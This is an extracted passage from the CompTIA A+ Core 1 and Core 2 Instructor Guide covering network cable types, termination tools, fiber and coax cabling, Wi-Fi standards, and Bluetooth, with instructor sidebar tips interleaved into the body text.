Teaching
Cat Max. Transfer Rate Max. Distance Ethernet Standard Support Tip
5 100 Mbps 100 m (328 ft) 100BASE-TX (Fast Ethernet) Note that both UTP
and STP are rated to
5e 1 Gbps 100 m (328 ft) 1000BASE-T (GB Ethernet) these standards.
6 1 Gbps 100 m (328 ft) 1000BASE-T (GB Ethernet)
Interaction
10 GBps 55 m (180 ft) 10GBASE-T (10 GB Ethernet) Opportunity
6A 10 GBps 100 m (328 ft) 10GBASE-T (10 GB Ethernet) If you have examples
of different cables,
The Cat specification is printed on the cable jacket along with the cable type (UTP
pass them around
or F/UTP, for instance). Cat 5 cable supports the older 100 Mbps Fast Ethernet or show them, and
standard. It is no longer commercially available. A network cabled with Cat 5 will point out the jacket
probably need to be rewired to support Gigabit Ethernet. markings identifying
the Cat specification.
Cat 5e would still be an acceptable choice for providing Gigabit Ethernet links for
client computers, but most sites would now opt to install Cat 6 cable. The improved
construction standards for Cat 6 mean that it is more reliable than Cat 5e for
Gigabit Ethernet, and it can also support 10 Gbps, though over reduced range.
Cat 6A supports 10 Gbps over 100 m, but the cable is bulkier and heavier than
Cat 5e and Cat 6, and the installation requirements more stringent, so fitting it
within pathways designed for older cable can be problematic. TIA/EIA standards
recommend Cat 6A for health care facilities, with Power over Ethernet (PoE) 802.3bt
installations, and for running distribution system cable to wireless access points.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
136 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
The TIA/EIA-568 standard defines two methods for terminating twisted pair: T568A/
T568B. In T568A, pin 1 is wired to green/white, pin 2 is wired to green, pin 3 is wired
to orange/white, and pin 6 is wired to orange. In T568B, the position of the green
and orange pairs is swapped over, so that orange terminates to 1 and 2 and green
to 3 and 6. When cabling a network, it is best to use the same termination method
consistently. A straight through Ethernet cable is wired with the same type of
termination at both ends.
Using T568A at one end and T568B at the other creates a crossover cable. Crossover
cables were once used to connect computers directly, but Gigabit Ethernet interfaces
can perform the crossover automatically, even if standard cable is used.
Twisted-pair can also be used with RJ11 connectors. Unlike the four-pair cable
used with Ethernet, RJ11 is typically used to terminate two-pair cable, which is
widely used in telephone systems and with broadband digital subscriber line (DSL)
modems.
Interaction
Installing cable in this type of system involves the use of cable strippers,
Opportunity
punchdown tools, and crimpers.
If you have cable
connectors and Cable Stripper and Snips
crimpers and/or IDCs
and punchdown To terminate cable, a small section of outer jacket must be removed to expose the
tools, consider having
wire pairs. This must be done without damaging the insulation on the inner wire
learners use them to
create cable segments. pairs. A cable stripper is designed to score the outer jacket just enough to allow it
to be removed. Set the stripper to the correct diameter, and then place the cable in
the stripper and rotate the tool once or twice. The score cut in the insulation should
now allow you to remove the section of jacket.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 137
Most Cat 6 and all Cat 6A cable has a plastic star filler running through it that keeps
the pairs separated. You need to use electrician’s scissors (snips) to cut off the
end of this before terminating the cable. There will also be a nylon thread called a
“ripcord.” This can be pulled down the jacket to open it up more if you damaged any
of the wire pairs initially. Snip any excess ripcord before terminating the cable.
Punchdown Tool
A punchdown tool is used to fix each conductor into an IDC. First, untwist the
wire pairs, and lay them in the color-coded terminals in the IDC in the appropriate
termination order (T568A or T568B). To reduce the risk of interference, no more
than ½” (13 mm) should be untwisted. Use the punchdown tool to press each wire
into the terminal. Blades in the terminal cut through the insulation to make an
electrical contact with the wire.
Connecting UTP cable to IDCs using a punchdown tool. (Image by dero2084 © 123RF.com.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
138 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Crimper
A crimper is used to fix a jack to a patch cord. Orient the RJ45 plug so that the tab
latch is underneath. Pin 1 is the first pin on the left. Arrange the wire pairs in the
appropriate order (T568A or T568B), and then push them into the RJ45 plug. Place
the plug in the crimper tool, and close it tightly to pierce the wire insulation at the
pins and seal the jack to the outer cable jacket.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 139
Toner Probe
Many cable testers also incorporate the function of a toner probe, which is used to
identify a cable from within a bundle. This may be necessary when the cables have
not been labeled properly. The tone generator is connected to the cable using an
RJ45 jack and applies a continuous audio signal on the cable. The probe is used to
detect the signal and follow the cable over ceilings and through ducts or identify it
from within the rest of the bundle.
Disconnect the other end of the cable from any network equipment before activating the
tone generator.
Loopback Plug
A loopback plug is used to test an NIC or switch port. You can make a basic
loopback plug from a 6” cable stub where the wires connect pin 1 to pin 3 and pin
2 to pin 6. When you connect a loopback plug to a port, you should see a solid link
LED showing that the port can send and receive.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
140 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
A loopback plug made from a cable stub is unlikely to work with Gigabit Ethernet ports.
You can obtain manufactured Gigabit port loopback testers.
Network Taps
Show A network tap is used to intercept the signals passing over a cable and send them
Slide(s) to a packet or protocol analyzer. Taps are either powered or unpowered:
Network Taps • A passive test access point (TAP) is a box with ports for incoming and outgoing
network cabling and an inductor or optical splitter that physically copies the
Teaching signal from the cabling to a monitor port. No logic decisions are made, so the
Tip monitor port receives every frame—corrupt or malformed or not—and the
Mirror ports aren’t copying is unaffected by load.
actually on the
objectives, but they • An active TAP is a powered device that performs signal regeneration, which
are probably worth may be necessary in some circumstances. Gigabit signaling over copper wire is
mentioning as a more
too complex for a passive tap to monitor, and some types of fiber links may be
common way of
implementing traffic adversely affected by optical splitting. Because it performs an active function, the
sniffing. TAP becomes a point of failure for the links during power loss.
Network sniffing can also be facilitated using a switched port analyzer (SPAN)/
mirror port. This means that the sensor is attached to a specially configured port on
a network switch. The mirror port receives copies of frames addressed to nominated
access ports (or all the other ports).
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 141
A plenum space is a void in a building designed to carry heating, ventilation, and Teaching
air conditioning (HVAC) systems. Plenum space is typically a false ceiling, though Tip
it could also be constructed as a raised floor. As it makes installation simpler, this Explain that these
space has also been used for communications wiring in some building designs. requirements affect
Plenum space is an effective conduit for fire, as there is plenty of airflow and no the jacket/insulation
fire breaks. If the plenum space is used for heating, there may also be higher materials.
temperatures. Therefore, building regulations require the use of fire-retardant CableWholesale
plenum cable in such spaces. Plenum cable must not emit large amounts of smoke has a useful guide
when burned, be self-extinguishing, and meet other strict fire safety standards. to the full range of
identifiers printed
General purpose (non-plenum) cabling uses PVC jackets and insulation. Plenum- on cable jackets
rated cable uses treated PVC or fluorinated ethylene polymer (FEP). This can make (cablewholesale.com/
the cable less flexible, but the different materials used have no effect on bandwidth. support/technical_
articles/jowling_for_
Data cable rated for plenum use under the US National Electrical Code (NEC) is
jackets.php)
marked as CMP/MMP on the jacket. General purpose cables are marked CMG/MMG
or CM/MP.
Direct Burial
Outside plant (OSP) is cable run on the external walls of a building or between two
buildings. This makes the cable vulnerable to different types of weathering:
• Aerial cable is typically strung between two poles or anchors. The ultraviolet (UV)
rays in sunlight plus exposure to more extreme and changing temperatures and
damp will degrade regular PVC.
• Conduit can provide more protection for buried cable runs. Such cable can still
be exposed to extreme temperatures and damp, however, so regular PVC cable
should not be used.
Show
• Direct burial cable is laid and then covered in earth or cement/concrete. Slide(s)
OSP cable types use special coatings to protect against UV and abrasion and are Optical Cabling
often gel filled to protect against temperature extremes and damp. Direct burial
cable may also need to be armored to protect against chewing by rodents. Teaching
Tip
Explain the
Optical Cabling advantages of fiber
optic cabling over UTP.
Copper wire carries electrical signals, which are sensitive to interference and
attenuation. The light pulses generated by lasers and LEDs are not susceptible to Interaction
interference and suffer less from attenuation. Consequently, optical cabling can Opportunity
support much higher bandwidth links, measured in multiple gigabits or terabits per
If you have samples
second, and longer cable runs, measured in miles rather than feet. of the various fiber
optic connectors that
can be passed around,
consider doing so.
Explain that there are
other types of fiber
optic connectors,
but this list focuses
A fiber optic strand. (Image by atrush © 123RF.com) on those that are
most commonly
encountered.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
142 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
An optical fiber consists of an ultra-fine core of glass to convey the light pulses. The
core is surrounded by glass or plastic cladding, which guides the light pulses along
the core. The cladding has a protective coating called the “buffer.” The fiber optic
cable is contained in a protective jacket and terminated by a connector.
Fiber optic cables fall into two broad categories: single-mode and multi-mode:
• Single-mode fiber (SMF) has a small core (8–10 microns) and is designed to
carry a long wavelength (1,310 or 1,550 nm) infrared signal, generated by a high-
power, highly coherent laser diode. Single-mode cables support data rates up to
10 Gbps or better and cable runs of many kilometers, depending on the quality
of the cable and optics.
• Multi-mode fiber (MMF) has a larger core (62.5 or 50 microns) and is designed
to carry a shorter wavelength infrared light (850 nm or 1,300 nm). MMF uses
less expensive and less coherent LEDs or vertical cavity surface emitting lasers
(VCSELs) and consequently is less expensive to deploy than SMF. However, MMF
does not support such high signaling speeds or long distances as single-mode
and so is more suitable for LANs than WANs.
The core of a fiber optic connector is a ceramic or plastic ferrule that ensures
continuous reception of the light signals. Several connector form factors are
available:
• Straight tip (ST) is a bayonet-style connector that uses a push-and-twist locking
mechanism; it is used mostly for multi-mode networks.
• Subscriber connector (SC) has a push/pull design that allows for simpler
insertion and removal than fiber channel (FC) connector. There are simplex
and duplex versions, though the duplex version is just two connectors clipped
together. It can be used for single- or multi-mode.
• Lucent connector (LC) is a small form factor connector with a tabbed push/pull
design. LC is similar to SC, but the smaller size allows for higher port density.
Patch cord with duplex SC format connectors (left) and LC connectors (right). (Image by YANAWUT
SUNTORNKIJ © 123RF.com.)
Patch cords for fiber optic can come with the same connector on each end (ST-ST,
for instance) or a mix of connectors (ST-SC, for instance). Fiber optic connectors
are quite easy to damage and should not be repeatedly plugged in and unplugged.
Unused ports and connectors should be covered by a dust cap to minimize the risk
of contamination.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 143
Coaxial Cabling
Coaxial (coax) cable is a different type of copper cabling, also carrying electrical Show
signals. Where twisted pair uses balancing to cancel out interference, coax uses Slide(s)
two conductors that share the same axis. The core signal conductor is enclosed by Coaxial Cabling
plastic insulation (dielectric), and then a second wire mesh conductor serves both as
shielding from EMI and as a ground. Teaching
Tip
Explain typical use
of coax cabling in
“cable” Internet access
services.
Coax is now mostly used for CCTV installations and as patch cable for Cable Access
TV (CATV) and broadband cable modems. Coax for CATV installations is typically
terminated using a screw-down F-type connector.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
144 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Review Activity:
Network Cable Types
6
Show 1. You are performing a wiring job, but the company wants to purchase the
Slide(s) media and components from another preferred supplier. The plan is to
install a network using copper cabling that will support Gigabit Ethernet.
Review
The customer is about to purchase Cat 5e cable spools. What factors
Teaching should they consider before committing to this decision?
Tip
Cat5e will meet the requirement and will cost the least. Cat 6 offers better
Take some time at performance without adding too much cost. Cat 6A would be the best choice for
the end of each topic
supporting future requirements, but it is likely to cost more than the customer is
to answer questions.
You can use the budgeting for.
review questions
for discussion in 2. A network consultant is recommending the use of S/FTP to extend a
class or set them for cable segment through a factory. Is this likely to be an appropriate cable
students to complete choice?
individually during or
after class. Yes. Shielded/foiled twisted pair (S/FTP) will provide the best protection from the
external interference sources likely to be generated by factory machinery.
The cable is plenum cable, rated for use in plenum spaces (building voids used with
HVAC systems).
A cable stripper to remove the jacket insulation and a punchdown tool to terminate
the wire pairs into insulation displacement connector (IDC) blocks.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 145
Topic 4D
Compare Wireless Networking Types
6
Wireless technologies can now achieve sufficient bandwidth to replace wired ports Teaching
for many types of clients in a typical office. It is also more convenient for SOHO Tip
networks to use wireless as the primary access method for computers, laptops, This topic lists
smartphones, tablets, and smart home devices. Wireless can provide connectivity each standard in
for desktops or even servers in places where it is difficult or expensive to run sequence with the
aim of explaining
network cabling. As a CompTIA A+ technician, you will often be called upon to bands, channels,
install, configure, and troubleshoot wireless technologies, so understanding the range, interference,
standards and types of devices that underpin a wireless network will help you to and bandwidth
provide effective support to your users and customers. improvements
(bonding, MIMO) along
the way.
Access Points
Wireless technologies use radio waves as transmission media. Radio systems use Show
transmission and reception antennas tuned to a specific frequency for the transfer Slide(s)
of signals. Most wireless LANs (WLANs) are based on the IEEE 802.11 standards, Access Points
better known by the brand name Wi-Fi.
Most Wi-Fi networks are configured in what is technically referred to as Teaching
“infrastructure mode.” Infrastructure mode means that each client device (station) Tip
is configured to connect to the network via an access point (AP). In 802.11 Explain that an access
documentation, this is referred to as an infrastructure “Basic Service Set” (BSS). The point performs the
same sort of function
MAC address of the AP’s radio is used as the Basic Service Set Identifier (BSSID). as a concentrator in a
An access point can establish a wireless-only network, but it can also work as a cabled network.
bridge to forward communications between the wireless stations and a wired
network. The wired network is referred to as the “distribution system” (DS). The
access point will be joined to the network in much the same way as a host computer
is—via a wall port and cabling to an Ethernet switch. An enterprise network is likely
to use Power over Ethernet (PoE) to power the AP over the data cabling.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
146 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Show
Slide(s)
802.11a and the 5 GHz
Frequency Band
An access point. (Image © 123RF.com)
Teaching
Tip
Note that 802.11a
802.11a and the 5 GHz Frequency Band
dates from 1999, so
students are unlikely
Every Wi-Fi device operates on a specific radio frequency range within an overall
to come across any frequency band. Each frequency band is split into a series of smaller ranges
devices that actually referred to as “channels.”
use it. Focus on the
features of the 5 GHz Frequency Bands
band.
Point out the It is important to understand the performance characteristics of the two main
relationship between frequency bands used by the IEEE 802.11 standards:
frequency, power,
range, and bandwidth.
• The 2.4 GHz standard is better at propagating through solid surfaces, giving it
A low frequency the longest signal range. However, the 2.4 GHz band does not support a high
signal, such as number of individual channels and is often congested, with both other Wi-Fi
UHF, can travel a networks and other types of wireless technology, such as Bluetooth®. Also,
long way but can microwave ovens work at frequencies in the 2.4 GHz band. Consequently, with
carry relatively little
the 2.4 GHz band, there is increased risk of interference, and the maximum
information because
lots of broadcasters achievable data rates are typically lower than with 5 GHz.
want to use this bit
of the spectrum, so • The 5 GHz standard is less effective at penetrating solid surfaces and so does
they are allocated not support the maximum ranges achieved with 2.4 GHz standards, but the
only narrow portions band supports more individual channels and suffers less from congestion and
of it. A Wi-Fi signal interference, meaning it supports higher data rates at shorter ranges.
needs more power
to travel even a short
distance, but it can
use wider "channels"
with a higher range
of frequencies in
them to carry more
information.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 147
The nominal indoor range for Wi-Fi over 2.4 GHz is 45 m (150 feet) and 30 m (100
feet) over 5 GHz. Depending on the wireless standard used, building features that
may block the signal, and interference from other radio sources, clients are only
likely to connect at full speed from a third to a half of those distances.
Unlicensed National Information Infrastructure (U-NII) sub-bands form the 20 MHz channels used
in the 5 GHz frequency band. Each sub-band is 5 MHz wide, so the Wi-Fi channels are spaced in
intervals of four to allow 20 MHz bandwidth. Channels within the DFS range will be disabled if the
access point detects radar signals.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
148 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
The IEEE 802.11g standard offered a relatively straightforward upgrade path from
802.11b; uses the same encoding mechanism and 54 Mbps rate as 802.11a but in
the 2.4 GHz band used by 802.11b and with the same channel layout. This made it
straightforward for vendors to design 802.11g devices that could offer backwards
support for legacy 802.11b clients.
802.11n
Show The IEEE 802.11n standard introduced several improvements to increase
Slide(s) bandwidth. It can work over both 2.4 GHz and 5 GHz. Each band is implemented
802.11n by a separate radio. An access point or adapter that can support simultaneous 2.4
GHz and 5 GHz operation is referred to as “dual band.” Cheaper client adapters and
Teaching many smartphone adapters support only a 2.4 GHz radio.
Tip The 802.11n standard allows two adjacent 20 MHz channels to be combined into
Without going into a single 40 MHz channel, referred to as “channel bonding.” Due to the restricted
too much detail, channel layout of 2.4 GHz, on a network with multiple APs, channel bonding is a
explain the features
practical option only in the 5 GHz band. However, note that 5 GHz channels are
that allow the
substantial bandwidth not necessarily contiguous and use of some channels may be blocked if the access
improvements in Wi-Fi point detects a radar signal.
4 (2009).
802.11n 40 MHz bonded channel options in the 5 GHz band. The center channel number is used to
identify each bonded channel.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 149
The other innovation introduced with 802.11n increases reliability and bandwidth
by multiplexing signal streams from 2–3 separate antennas. This technology
is referred to as “multiple input multiple output” (MIMO). The antenna
configuration is represented as 1x1, 2x2, or 3x3 to indicate the number of transmit
and receive antennas available to the radio.
The nominal data rate for 802.11n is 72 Mbps per stream or 150 Mbps per stream
for a 40 MHz bonded channel, and 802.11n access points are marketed using Nxxx
designations, where xxx is the nominal bandwidth. As an example, an N600 2x2
access point can allocate a bonded channel two streams for a data rate of 300
Mbps, and if it does this simultaneously on both its 2.4 GHz and 5 GHz radios, the
bandwidth of the access point could be described as 600 Mbps.
In recent years, Wi-Fi standards have been renamed with simpler digit numbers;
802.11n is now officially designated as Wi-Fi 4.
Wi-Fi 5 access points are marketed using AC values, such as AC5300. The 5300 value
is made up of the following:
• 1,000 Mbps over a 40 MHz channel with 2x2 streams on the 2.4 GHz radio.
• 2,166 Mbps over an 80 MHz bonded channel with 4x4 streams on the first 5 GHz
radio.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
150 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
You’ll notice that, given 802.11n 150 Mbps per stream (40 MHz channels) and 802.11ac
433 Mbps per stream (80 MHz channels), none of those values can be made to add up.
The labels are only useful as relative performance indicators.
Multiuser MIMO
In basic 802.11 operation modes, bandwidth is shared between all stations. An AP
can communicate with only one station at a time; multiple station requests go into
a queue. This means that Wi-Fi networks experience the same sort of contention
issues as legacy Ethernet hubs. Wi-Fi 5 products partially address this problem
using multiuser MIMO (MU-MIMO). In Wi-Fi 5, downlink MU-MIMO (DL MU-MIMO)
allows the access point to use its multiple antennas to send data to up to four
clients simultaneously.
Wi-Fi 6 (802.11ax)
Wi-Fi 6 improves the per-stream data rate over an 80 MHz channel to 600 Mbps.
As with Wi-Fi 5, products are branded using the combined throughput of all radios.
For example, AX6000 claims nominal rates of 1,148 Mbps on the 2.4 GHz radio and
4,804 Mbps over 5 GHz.
Wi-Fi 6 works in both the 2.4 GHz and 5 GHz bands. The Wi-Fi 6e standard adds
support for a new 6 GHz frequency band. 6 GHz has less range, but more frequency
space, making it easier to use 80 and 160 MHz channels.
Where Wi-Fi 5 supports up to four simultaneous clients over 5 GHz only, Wi-Fi 6 can
support up to eight clients, giving it better performance in congested areas. Wi-Fi 6
also adds support for uplink MU-MIMO, which allows MU-MIMO-capable clients to
send data to the access point simultaneously.
Wi-Fi 6 introduces another technology to improve simultaneous connectivity called
“orthogonal frequency division multiple access” (OFDMA). OFDMA can work
alongside MU-MIMO to improve client density—sustaining high data rates when
more stations are connected to the same access point.
Show
Slide(s) Wireless LAN Installation Considerations
Wireless LAN
Clients identify an infrastructure WLAN through the network name or service set
Installation
Considerations identifier (SSID) configured on the access point. An SSID can be up to 32 bytes in
length and, for maximum compatibility, should only use ASCII letters and digits plus
Teaching the hyphen and underscore characters.
Tip
Show how the
concepts covered so
far are implemented
in the configuration
setting pages of a
typical access point.
Interaction
Opportunity
If you have Internet
access, you can
demonstrate
configuration on an
emulator (emulator.
tp-link.com/1201-
ap/index.html for
example).
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 151
When configuring an access point, you need to choose whether to use the same or
different network names for both frequency bands. If you use the same SSID, the
access point and client device will use a probe to select the band with the strongest
signal. If you configure separate names, the user can choose which network and
band to use.
For each frequency band, you also need to select the operation mode. This
determines compatibility with older standards and support for legacy client devices.
Supporting older devices can reduce performance for all stations.
Finally, for each frequency band, you need to configure the channel number and
whether to use channel bonding. If there are multiple access points whose ranges
overlap, they should be configured to use nonoverlapping channels to avoid
interference. An access point can be left to autoconfigure the best channel, but this
does not always work well. You can configure wide channels (bonding) for more
bandwidth, but this has the risk of increased interference if there are multiple
nearby wireless networks. Channel bonding may only be practical in the 5 GHz
band, depending on the wireless site design.
Along with the Wi-Fi frequency band and channel settings, you should also configure
security parameters to control who is allowed to connect. Wi-Fi security is covered in the
Core 2 course.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
152 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Wi-Fi Analyzers
Show To determine the best channel layout and troubleshoot wireless network
Slide(s) performance, you need to measure the signal strength of the different networks
Wi-Fi Analyzers using each channel. This can be accomplished using a Wi-Fi analyzer. This type of
software can be installed to a laptop or smartphone. It will record statistics for the
Interaction AP that the client is currently associated with and detect any other access points in
Opportunity the vicinity.
Consider Wireless signal strength is measured in decibel (dB) units. Signal strength is
demonstrating use represented as the ratio of a measurement to 1 milliwatt (mw), where 1 mW is
of a Wi-Fi analyzer
to report nearby
equal to 0 dBm. Because 0 dBm is 1 mW, a negative value for dBm represents a
networks. fraction of a milliwatt. For example, -30 dBm is 0.001 mW; -60 dBm is 0.000001 mW.
Wi-Fi devices are all constrained by regulations governing spectrum use and output
only small amounts of power.
When you are measuring signal strength, dBm values closer to zero represent
better performance. A value around -65 dBm represents a good signal, while
anything over -80 dBm is likely to suffer packet loss or be dropped.
The dB units express the ratio between two values using a logarithmic scale. A
logarithmic scale is nonlinear, so a small change in value represents a large change in
the performance measured. For example, +3 dB means doubling, while -3 dB means
halving.
The comparative strength of the data signal to the background noise is called
the signal-to-noise ratio (SNR). Noise is also measured in dBm, but here values
closer to zero are less welcome, as they represent higher noise levels. For example,
if signal is ‑65 dBm and noise is ‑90 dBm, the SNR is the difference between the
two values, expressed in dB (25 dB). If noise is -80 dBm, the SNR is 15 dB and the
connection will be much, much worse.
In the following screenshot, a Wi-Fi analyzer is being used to report nearby
networks and channel configurations. The “hom” network is supported by two
access points using the same SSID for both bands. They are configured to use
channels 6 and 11 on the 2.4 GHz band, with the stronger signal on channel 6,
indicating the closer access point. On the 5 GHz band, only the signal on channel
36 is detected by this client. This is because 5 GHz has less range than 2.4 GHz.
The blurred networks belong to other owners and have much weaker signals. Also
note from the status bar that the client adapter supports Wi-Fi 6 (ax), but the access
points only support b/g/n/ac (shown in the mode column).
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 153
Metageek inSSIDer Wi-Fi analyzer software showing nearby access points. (MetaGeek,
LLC. © Copyright 2005-2021)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
154 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
• Effective isotropic radiated power (EIRP) is the sum of transmit power and
gain, expressed in dBm.
Lower frequencies that propagate farther have stricter power limits than higher
frequencies. However, higher EIRPs are typically allowed for highly directional
antennas. For example, in the 2.4 GHz band, each 3 dBi increase in gain can be
compensated for by just a 1 dBm reduction in transmit power. This allows point-to-
point wireless antennas to work over longer ranges than Wi-Fi APs.
Teaching Bluetooth is used to connect peripheral devices to PCs and mobiles and to share
Tip data between two systems. Many portable devices, such as smartphones, tablets,
wearable tech, audio speakers, and headphones, now use Bluetooth connectivity.
Explain that these
standards are also Bluetooth uses radio communications and supports speeds of up to 3 Mbps.
based on radio Adapters supporting version 3 or 4 of the standard can achieve faster rates (up to
networking, but with 24 Mbps) through the ability to negotiate an 802.11 radio link for large file transfers.
lower transfer rates/
range and for different The earliest Bluetooth version supports a maximum range of 10 m (30 feet), while
use cases. newer versions support a range of over 100 feet, though signal strength will be
weak at this distance. Bluetooth devices can use a pairing procedure to authenticate
and exchange data securely.
Version 4 introduced a Bluetooth Low Energy (BLE) variant of the standard. BLE is
designed for small battery-powered devices that transmit small amounts of data
infrequently. A BLE device remains in a low power state until a monitor application
initiates a connection. BLE is not backwards compatible with “classic” Bluetooth,
though a device can support both standards simultaneously.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 155
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
156 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Review Activity:
Wireless Networking Types
7
Show 1. You are assessing standards compatibility for a Wi-Fi network. Most
Slide(s) employees have mobile devices with single-band 2.4 GHz radios. Which
Review
Wi-Fi standards work in this band?
Wi-Fi 6 (802.11ax), Wi-Fi 4 (802.11n), and the legacy standards 802.11g and 802.11b.
Teaching
Tip 2. You are explaining your plan to use the 5 GHz band predominantly for
Take some time at an open plan office network. The business owner has heard that this is
the end of each topic shorter range, so what are its advantages over the 2.4 GHz band?
to answer questions.
You can use the Each numbered channel in a 2.4 GHz network is only 5 MHz wide, while Wi-Fi
review questions
requires about 20 MHz. Consequently, there is not much space for separate
for discussion in
class or set them for networks, and the chances of overlap are high. Numerous other product types
students to complete of work in the 2.4 GHz band, increasing the risk of interference. Using 5 GHz will
individually during or present a better opportunity to use channel bonding to increase bandwidth. As
after class. an open plan office does not have solid walls or other building features to block
signals, the slightly reduced range of 5 GHz signaling should not be a significant
drawback.
No. First, a client can only use one radio at a time and so cannot connect
simultaneously to the 2.4 GHZ and 5 GHz bands. Secondl, 802.11ac works only at 5
GHz; 802.11ac access points use the 2.4 GHz band to support 802.11b/g/n clients.
The 802.11ac standard can increase bandwidth by using multiple input output
(MIMO) antenna configurations to allocate more streams, such as 2x2 or 3x3.
4. You are setting up a Wi-Fi network. Do you need to configure the BSSID?
No. You need to configure the service set identifier (SSID), unless you want to rely
on the default value. The SSID is a name for users to recognize the network by. The
basic SSID (BSSID) is the MAC address of the access point’s radio. As this is coded
into the device firmware, it does not need to be configured. Stations use the BSSID
to send frames to the access point.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 157
False. Each band can be assigned a different service set identifier (SSID) or network
name. Access points also allow the configuration of multiple SSIDs per radio, such
as configuring a secure network for known clients and an open network for guests.
False. These installations may use unlicensed spectrum but must not exceed
the effective isotropic radiated power (EIRP) defined for the frequency band by
regulations.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
158 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Lesson 4
Summary
7
Show You should be able to compare network types (LAN, WLAN, WAN, MAN, SAN, and
Slide(s) PAN), network hardware, cable types, and wireless protocols and use networking
tools to install and verify local cabled and wireless networks.
Summary
Teaching
Guidelines for Installing a SOHO Network
Tip Follow these guidelines to install a SOHO network:
Try to include some
time at the end • Identify the number of wired ports that must be provisioned and whether Cat
of each lesson to 6 cable for Gigabit Ethernet will suffice or Cat 6A for 10G Ethernet and/or high
check students' power PoE is required.
understanding and
answer questions. • Identify cable runs, and assess them for factors that might require special cable
types, such as shielding against external interference, plenum-rated, or outdoor/
Interaction
direct burial.
Opportunity
Get students to • Obtain patch panels matched to the cable type and switches with sufficient
browse vendor sites to ports to meet the requirement. Determine whether the port requirement can be
identify different types met with a single unmanaged switch or the network is large enough to require
and costs of network
managed switches.
hardware:
• 100 m bulk Cat 6 • Use cable stripper and punchdown tools to wire wall ports to patch panel IDCs
solid cable using solid cable, taking care to label each port and validate each segment using
• 100 m bulk Cat a cable tester.
6 external grade
solid cable • Optionally, create RJ45 patch cords using stranded cable, testing each one.
• 100 m bulk Cat 6A
F/FTP solid cable • Use patch cords to connect each patch panel port to a switch port.
• Cat 6 24-port patch
• Deploy one or more access points to provision a wireless network supporting
panel
a given range of protocols/standards (802.11abg or Wi-Fi 4/5/6) using a Wi-Fi
• Cat 6A 24-port FTP
analyzer to check signal strength. If multiple access points are required, configure
shielded patch
panel nonoverlapping channels for them to use. Consider whether to use the same
network for 2.4 and 5 GHz bands or create separate networks for each band.
• Unmanaged
eight-port desktop
• Consider whether there is any requirement for long-range fixed wireless to
switch
bridge two sites and the implications of using licensed or unlicensed spectrum to
• Managed 24-port
implement it.
PoE-enabled
workgroup switch
• Assess requirements for Bluetooth, RFC, and NFC wireless products to
implement PANs or inventory/access control systems.
• Assess requirements for SMF and/or MMF fiber optic cabling terminated using
SC, ST, or LC connectors to implement high bandwidth LAN links or long distance
WAN links.
Additional practice questions for the topics covered in this lesson are available on the
CompTIA Learning Center.
